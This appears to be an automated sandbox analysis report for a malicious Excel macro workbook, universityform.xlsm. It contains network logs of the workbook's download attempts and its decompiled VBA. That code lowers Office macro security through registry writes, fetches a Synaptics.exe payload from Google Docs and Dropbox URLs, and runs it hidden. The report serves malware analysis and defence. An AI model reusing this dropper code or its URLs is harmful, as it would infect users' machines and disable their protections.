                                  Set-Cookie: gvc=OTkyNjM2MDMyMzAzNzEyMjM5MDI5NDMzMTQ0NjY2MDE5Njg1MzE=; Path=/; Expires=Sat, 29 Dec 2029 10:00:09 GMT; HttpOnly; Secure; SameSite=None
                                  X-Content-Type-Options: nosniff
                                  X-Permitted-Cross-Domain-Policies: none
                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                  X-Xss-Protection: 1; mode=block
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 1121
                                  Date: Mon, 30 Dec 2024 10:00:09 GMT
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                  Server: envoy
                                  Cache-Control: no-cache, no-store
                                  Vary: Accept-Encoding
                                  X-Dropbox-Response-Origin: far_remote
                                  X-Dropbox-Request-Id: 2178b4c2b94f48d7a093e7224818a1b7
                                  Connection: close
                                  2024-12-30 10:00:10 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                  Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.1050016142.250.185.1744437344C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-12-30 10:01:18 UTC192OUTGET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                                  Host: docs.google.com
                                  2024-12-30 10:01:18 UTC1223INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Dec 2024 10:01:18 GMT
                                  Strict-Transport-Security: max-age=31536000
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: script-src 'nonce-d5JSqhe8I_8TiT8oYCYOmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  X-XSS-Protection: 0
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2024-12-30 10:01:18 UTC167INData Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                                  Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
                                  2024-12-30 10:01:18 UTC1390INData Raw: 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 62 32 6f 58 57 73 59 47 54 2d 4e 30 62 79 6c 62 44 70 5a 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 3b 7d 2a
                                  Data Ascii: tle><style nonce="kb2oXWsYGT-N0bylbDpZeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
                                  2024-12-30 10:01:18 UTC102INData Raw: 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                  Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                  2024-12-30 10:01:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.1050017162.125.66.184437344C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-12-30 10:01:19 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                                  Host: www.dropbox.com
                                  2024-12-30 10:01:19 UTC825INHTTP/1.1 409 Conflict
                                  Content-Security-Policy: script-src 'none'
                                  Content-Security-Policy: sandbox
                                  Pragma: no-cache
                                  Referrer-Policy: strict-origin-when-cross-origin
                                  Set-Cookie: gvc=MTI1Mzg3NjUzNzA2NjU0MjMzNjkxMTg3OTAwODAyMDQxNzAwNTc5; Path=/; Expires=Sat, 29 Dec 2029 10:01:19 GMT; HttpOnly; Secure; SameSite=None
                                  X-Content-Type-Options: nosniff
                                  X-Permitted-Cross-Domain-Policies: none
                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                  X-Xss-Protection: 1; mode=block
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 1121
                                  Date: Mon, 30 Dec 2024 10:01:19 GMT
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                  Server: envoy
                                  Cache-Control: no-cache, no-store
                                  Vary: Accept-Encoding
                                  X-Dropbox-Response-Origin: far_remote
                                  X-Dropbox-Request-Id: b4d7778013a4402f849e94023b4f90d3
                                  Connection: close
                                  2024-12-30 10:01:19 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                  Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.1050018162.125.66.184437344C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-12-30 10:01:20 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                                  Host: www.dropbox.com
                                  2024-12-30 10:01:20 UTC825INHTTP/1.1 409 Conflict
                                  Content-Security-Policy: script-src 'none'
                                  Content-Security-Policy: sandbox
                                  Pragma: no-cache
                                  Referrer-Policy: strict-origin-when-cross-origin
                                  Set-Cookie: gvc=MjA2MDU2OTIyOTQ0MTg2NTI5OTE0MjE0MTEwMzE1ODAyMDgwNDA=; Path=/; Expires=Sat, 29 Dec 2029 10:01:20 GMT; HttpOnly; Secure; SameSite=None
                                  X-Content-Type-Options: nosniff
                                  X-Permitted-Cross-Domain-Policies: none
                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                  X-Xss-Protection: 1; mode=block
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 1121
                                  Date: Mon, 30 Dec 2024 10:01:20 GMT
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                  Server: envoy
                                  Cache-Control: no-cache, no-store
                                  Vary: Accept-Encoding
                                  X-Dropbox-Response-Origin: far_remote
                                  X-Dropbox-Request-Id: f8c7fcc29dbc45a69444d53d8ba08cb2
                                  Connection: close
                                  2024-12-30 10:01:20 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                  Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:05:00:00
                                  Start date:30/12/2024
                                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x7c0000
                                  File size:53'161'064 bytes
                                  MD5 hash:4A871771235598812032C822E6F68F19
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:13
                                  Start time:05:01:05
                                  Start date:30/12/2024
                                  Path:C:\Windows\splwow64.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\splwow64.exe 12288
                                  Imagebase:0x7ff674220000
                                  File size:163'840 bytes
                                  MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:15
                                  Start time:05:01:14
                                  Start date:30/12/2024
                                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
                                  Imagebase:0x7c0000
                                  File size:53'161'064 bytes
                                  MD5 hash:4A871771235598812032C822E6F68F19
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Call Graph

                                  Module: ThisWorkbook

                                  Declaration
                                  LineContent
                                  1

                                  Attribute VB_Name = "ThisWorkbook"

                                  2

                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                  3

                                  Attribute VB_GlobalNameSpace = False

                                  4

                                  Attribute VB_Creatable = False

                                  5

                                  Attribute VB_PredeclaredId = True

                                  6

                                  Attribute VB_Exposed = True

                                  7

                                  Attribute VB_TemplateDerived = False

                                  8

                                  Attribute VB_Customizable = True

                                  9

                                  Dim SheetsChanged as Boolean

                                  10

                                  Dim SheetCount as Integer

                                  APIsMeta Information

                                  CreateObject

                                  CreateObject("scripting.filesystemobject")

                                  Path

                                  ActiveWorkbook

                                  Path

                                  ActiveWorkbook

                                  Environ

                                  Environ("Temp") -> C:\Users\brok\AppData\Local\Temp

                                  FileExists

                                  FileExists

                                  FileCopy

                                  Shell

                                  vbHide

                                  FileExists

                                  FileExists

                                  FileCopy

                                  Shell

                                  vbHide

                                  FileExists

                                  Environ

                                  Environ("ALLUSERSPROFILE") -> C:\ProgramData

                                  Shell

                                  Environ

                                  vbHide

                                  FileExists

                                  Environ

                                  Environ("WINDIR") -> C:\Windows

                                  Shell

                                  Environ

                                  vbHide

                                  FileExists

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: Option

                                  Part of subcall function FDW@ThisWorkbook: Option

                                  Part of subcall function FDW@ThisWorkbook: AllowRedirects

                                  Part of subcall function FDW@ThisWorkbook: Open

                                  Part of subcall function FDW@ThisWorkbook: Send

                                  Part of subcall function FDW@ThisWorkbook: Status

                                  Part of subcall function FDW@ThisWorkbook: InStr

                                  Part of subcall function FDW@ThisWorkbook: ResponseText

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: Open

                                  Part of subcall function FDW@ThisWorkbook: Type

                                  Part of subcall function FDW@ThisWorkbook: Write

                                  Part of subcall function FDW@ThisWorkbook: ResponseBody

                                  Part of subcall function FDW@ThisWorkbook: SaveToFile

                                  Part of subcall function FDW@ThisWorkbook: Close

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: Option

                                  Part of subcall function FDW@ThisWorkbook: Option

                                  Part of subcall function FDW@ThisWorkbook: AllowRedirects

                                  Part of subcall function FDW@ThisWorkbook: Open

                                  Part of subcall function FDW@ThisWorkbook: Send

                                  Part of subcall function FDW@ThisWorkbook: Status

                                  Part of subcall function FDW@ThisWorkbook: InStr

                                  Part of subcall function FDW@ThisWorkbook: ResponseText

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: Open

                                  Part of subcall function FDW@ThisWorkbook: Type

                                  Part of subcall function FDW@ThisWorkbook: Write

                                  Part of subcall function FDW@ThisWorkbook: ResponseBody

                                  Part of subcall function FDW@ThisWorkbook: SaveToFile

                                  Part of subcall function FDW@ThisWorkbook: Close

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: Option

                                  Part of subcall function FDW@ThisWorkbook: Option

                                  Part of subcall function FDW@ThisWorkbook: AllowRedirects

                                  Part of subcall function FDW@ThisWorkbook: Open

                                  Part of subcall function FDW@ThisWorkbook: Send

                                  Part of subcall function FDW@ThisWorkbook: Status

                                  Part of subcall function FDW@ThisWorkbook: InStr

                                  Part of subcall function FDW@ThisWorkbook: ResponseText

                                  Part of subcall function FDW@ThisWorkbook: CreateObject

                                  Part of subcall function FDW@ThisWorkbook: Open

                                  Part of subcall function FDW@ThisWorkbook: Type

                                  Part of subcall function FDW@ThisWorkbook: Write

                                  Part of subcall function FDW@ThisWorkbook: ResponseBody

                                  Part of subcall function FDW@ThisWorkbook: SaveToFile

                                  Part of subcall function FDW@ThisWorkbook: Close

                                  FileExists

                                  Shell

                                  vbHide

                                  Shell

                                  vbHide

                                  StringsDecrypted Strings
                                  "scripting.filesystemobject"
                                  "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
                                  "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                  "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                  "Temp"
                                  "ALLUSERSPROFILE"
                                  "ALLUSERSPROFILE"
                                  "WINDIR"
                                  "WINDIR"
                                  LineInstructionMeta Information
                                  147

                                  Sub MPS()

                                  148

                                  Dim FSO as Object

                                  executed
                                  149

                                  Dim FP(1 To 3), TMP, URL(1 To 3) as String

                                  151

                                  Set FSO = CreateObject("scripting.filesystemobject")

                                  CreateObject("scripting.filesystemobject")

                                  executed
                                  152

                                  FP(1) = ActiveWorkbook.Path & "\~$cache1"

                                  Path

                                  ActiveWorkbook

                                  153

                                  FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

                                  Path

                                  ActiveWorkbook

                                  155

                                  URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"

                                  156

                                  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"

                                  157

                                  URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"

                                  158

                                  TMP = Environ("Temp") & "\~$cache1.exe"

                                  Environ("Temp") -> C:\Users\brok\AppData\Local\Temp

                                  executed
                                  160

                                  If FSO.FileExists(FP(1)) Then

                                  FileExists

                                  161

                                  If Not FSO.FileExists(TMP) Then

                                  FileExists

                                  162

                                  FileCopy FP(1), TMP

                                  FileCopy

                                  163

                                  Endif

                                  164

                                  Shell TMP, vbHide

                                  Shell

                                  vbHide

                                  165

                                  Elseif FSO.FileExists(FP(2)) Then

                                  FileExists

                                  166

                                  If Not FSO.FileExists(TMP) Then

                                  FileExists

                                  167

                                  FileCopy FP(2), TMP

                                  FileCopy

                                  168

                                  Endif

                                  169

                                  Shell TMP, vbHide

                                  Shell

                                  vbHide

                                  170

                                  Else

                                  171

                                  If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then

                                  FileExists

                                  Environ("ALLUSERSPROFILE") -> C:\ProgramData

                                  executed
                                  172

                                  Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide

                                  Shell

                                  Environ

                                  vbHide

                                  173

                                  Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then

                                  FileExists

                                  Environ("WINDIR") -> C:\Windows

                                  executed
                                  174

                                  Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide

                                  Shell

                                  Environ

                                  vbHide

                                  175

                                  Elseif Not FSO.FileExists(TMP) Then

                                  FileExists

                                  176

                                  If FDW((URL(1)), (TMP)) Then

                                  177

                                  Elseif FDW((URL(2)), (TMP)) Then

                                  178

                                  Elseif FDW((URL(3)), (TMP)) Then

                                  179

                                  Endif

                                  180

                                  If FSO.FileExists(TMP) Then

                                  FileExists

                                  181

                                  Shell TMP, vbHide

                                  Shell

                                  vbHide

                                  182

                                  Endif

                                  183

                                  Else

                                  184

                                  Shell TMP, vbHide

                                  Shell

                                  vbHide

                                  185

                                  Endif

                                  187

                                  Endif

                                  189

                                  End Sub

                                  APIsMeta Information

                                  Sheets

                                  Sheets

                                  xlSheetVisible

                                  Part of subcall function RegKeySave@ThisWorkbook: CreateObject

                                  Part of subcall function RegKeySave@ThisWorkbook: RegWrite

                                  Version

                                  Part of subcall function RegKeySave@ThisWorkbook: CreateObject

                                  Part of subcall function RegKeySave@ThisWorkbook: RegWrite

                                  Version

                                  DisplayAlerts

                                  Count

                                  Worksheets

                                  Part of subcall function MPS@ThisWorkbook: CreateObject

                                  Part of subcall function MPS@ThisWorkbook: Path

                                  Part of subcall function MPS@ThisWorkbook: ActiveWorkbook

                                  Part of subcall function MPS@ThisWorkbook: Path

                                  Part of subcall function MPS@ThisWorkbook: ActiveWorkbook

                                  Part of subcall function MPS@ThisWorkbook: Environ

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: FileCopy

                                  Part of subcall function MPS@ThisWorkbook: Shell

                                  Part of subcall function MPS@ThisWorkbook: vbHide

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: FileCopy

                                  Part of subcall function MPS@ThisWorkbook: Shell

                                  Part of subcall function MPS@ThisWorkbook: vbHide

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: Environ

                                  Part of subcall function MPS@ThisWorkbook: Shell

                                  Part of subcall function MPS@ThisWorkbook: Environ

                                  Part of subcall function MPS@ThisWorkbook: vbHide

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: Environ

                                  Part of subcall function MPS@ThisWorkbook: Shell

                                  Part of subcall function MPS@ThisWorkbook: Environ

                                  Part of subcall function MPS@ThisWorkbook: vbHide

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: FileExists

                                  Part of subcall function MPS@ThisWorkbook: Shell

                                  Part of subcall function MPS@ThisWorkbook: vbHide

                                  Part of subcall function MPS@ThisWorkbook: Shell

                                  Part of subcall function MPS@ThisWorkbook: vbHide

                                  Select

                                  StringsDecrypted Strings
                                  "HKCU\Software\Microsoft\Office\"
                                  "REG_DWORD"
                                  "HKCU\Software\Microsoft\Office\"
                                  "REG_DWORD"
                                  LineInstructionMeta Information
                                  12

                                  Private Sub Workbook_Open()

                                  13

                                  Dim i as Integer

                                  executed
                                  14

                                  For i = 1 To ActiveWorkbook.Sheets.Count

                                  Sheets

                                  15

                                  ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                                  Sheets

                                  xlSheetVisible

                                  16

                                  Next i

                                  Sheets

                                  18

                                  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"

                                  Version

                                  19

                                  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"

                                  Version

                                  21

                                  Application.DisplayAlerts = False

                                  DisplayAlerts

                                  22

                                  SheetCount = Worksheets.Count

                                  Count

                                  Worksheets

                                  24

                                  Call MPS()

                                  26

                                  ActiveWorkbook.Sheets(1).Select

                                  Select

                                  27

                                  SheetsChanged = False

                                  28

                                  End Sub

                                  APIsMeta Information

                                  CreateObject

                                  CreateObject("WinHttp.WinHttpRequest.5.1")

                                  CreateObject

                                  Option

                                  Option

                                  AllowRedirects

                                  Open

                                  WinHttpRequest.Open("GET","https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download",False) WinHttpRequest.Open("GET","https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1",False)

                                  Send

                                  Status

                                  WinHttpRequest.Status() -> 404 WinHttpRequest.Status() -> 409

                                  InStr

                                  ResponseText

                                  CreateObject

                                  Open

                                  Type

                                  Write

                                  ResponseBody

                                  SaveToFile

                                  Close

                                  StringsDecrypted Strings
                                  "WinHttp.WinHttpRequest.5.1"
                                  "WinHttp.WinHttpRequest.5"
                                  "WinHttp.WinHttpRequest.5"
                                  "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
                                  "GET"
                                  "404 Not Found"
                                  ">Not Found<"
                                  "ADODB.Stream"
                                  "Dropbox - Error"
                                  "404 Not Found"
                                  ">Not Found<"
                                  "ADODB.Stream"
                                  "Dropbox - Error"
                                  "ADODB.Stream"
                                  LineInstructionMeta Information
                                  191

                                  Function FDW(MYU, NMA as String) as Boolean

                                  192

                                  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")

                                  CreateObject("WinHttp.WinHttpRequest.5.1")

                                  executed
                                  193

                                  If WinHttpReq Is Nothing Then

                                  194

                                  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

                                  CreateObject

                                  195

                                  Endif

                                  197

                                  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

                                  Option

                                  198

                                  WinHttpReq.Option(6) = AllowRedirects

                                  Option

                                  AllowRedirects

                                  199

                                  WinHttpReq.Open "GET", MYU, False

                                  WinHttpRequest.Open("GET","https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download",False)

                                  executed
                                  200

                                  WinHttpReq.Send

                                  Send

                                  202

                                  If (WinHttpReq.Status = 200) Then

                                  WinHttpRequest.Status() -> 404

                                  executed
                                  203

                                  If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then

                                  InStr

                                  ResponseText

                                  204

                                  FDW = True

                                  205

                                  Set oStream = CreateObject("ADODB.Stream")

                                  CreateObject

                                  206

                                  oStream.Open

                                  Open

                                  207

                                  oStream.Type = 1

                                  Type

                                  208

                                  oStream.Write WinHttpReq.ResponseBody

                                  Write

                                  ResponseBody

                                  209

                                  oStream.SaveToFile (NMA)

                                  SaveToFile

                                  210

                                  oStream.Close

                                  Close

                                  211

                                  Else

                                  212

                                  FDW = False

                                  213

                                  Endif

                                  214

                                  Else

                                  215

                                  FDW = False

                                  216

                                  Endif

                                  217

                                  End Function

                                  APIsMeta Information

                                  CreateObject

                                  CreateObject("WScript.Shell")

                                  RegWrite

                                  StringsDecrypted Strings
                                  "WScript.Shell"
                                  LineInstructionMeta Information
                                  138

                                  Sub RegKeySave(i_RegKey as String, i_Value as String, optional i_Type as String = "REG_SZ")

                                  141

                                  Dim myWS as Object

                                  executed
                                  143

                                  Set myWS = CreateObject("WScript.Shell")

                                  CreateObject("WScript.Shell")

                                  executed
                                  144

                                  myWS.RegWrite i_RegKey, i_Value, i_Type

                                  RegWrite

                                  145

                                  End Sub

                                  APIsMeta Information

                                  Saved

